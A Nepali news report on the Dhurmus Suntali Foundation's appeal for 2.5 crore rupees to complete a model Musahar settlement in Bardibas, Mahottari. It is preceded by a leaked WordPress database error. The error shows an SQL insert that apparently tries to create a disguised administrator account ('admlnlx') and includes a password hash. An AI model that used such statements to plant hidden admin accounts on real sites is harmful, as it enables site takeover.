WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BufO1Tn6LI.kuV7bxNcT0Fz2QzDEnB0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:17:11', '', 'admlnlx', 'admlnlx')
मोहत्तरी,फागुन २-
आगामी वैशाख १ गते हस्तान्तरण गर्ने उद्देश्यका साथ तीव्र गतिमा निर्माणाधीन अवस्थामा रहेको महोत्तरीको बर्दिवासस्थित एकीकृत नमुना मुसहर बस्तीका लागि अढाई करोड रकमको आवश्यकता देखिएको छ।
धुर्मुस सुन्तली फाउन्डेसनका अध्यक्ष सीताराम कट्टेल (धुर्मुस) ले सोमबार बिहान पत्रकारसँग कुराकानी गर्दै सो जानकारी गराएका हुन्। पचास घर परिवार मुसहरको लागि गत पुस २५ गते वरिष्ठ हाँस्य कलाकार महजोडीसहित एक दर्जनभन्दा बढी राष्ट्रियस्तरका कलाकारहरूद्वारा शिलान्यास भएको सो एकीकृत नमुना बस्तीको भवनको कार्य ३६ प्रतिशत सम्पन्न भएको अवस्थामा दुई करोड विभिन्न माध्यमबाट सङ्कलन भईसकेको अध्यक्ष धुर्मुसले बताए।
अपुग रकम सहयोगका लागि उनले अपिल गरेका छन्। जसरी भएपनि फाउन्डेसनले तोकिएको समयमै आधुनिक भौतिक संरचना, उद्यान, सामुदायिक पाठशालासहितको एकीकृत नमुना मुसहर बस्ती निर्माण र हस्तान्तरण गर्ने प्रतिबद्धता फाउन्डेसनले जनाएको छ।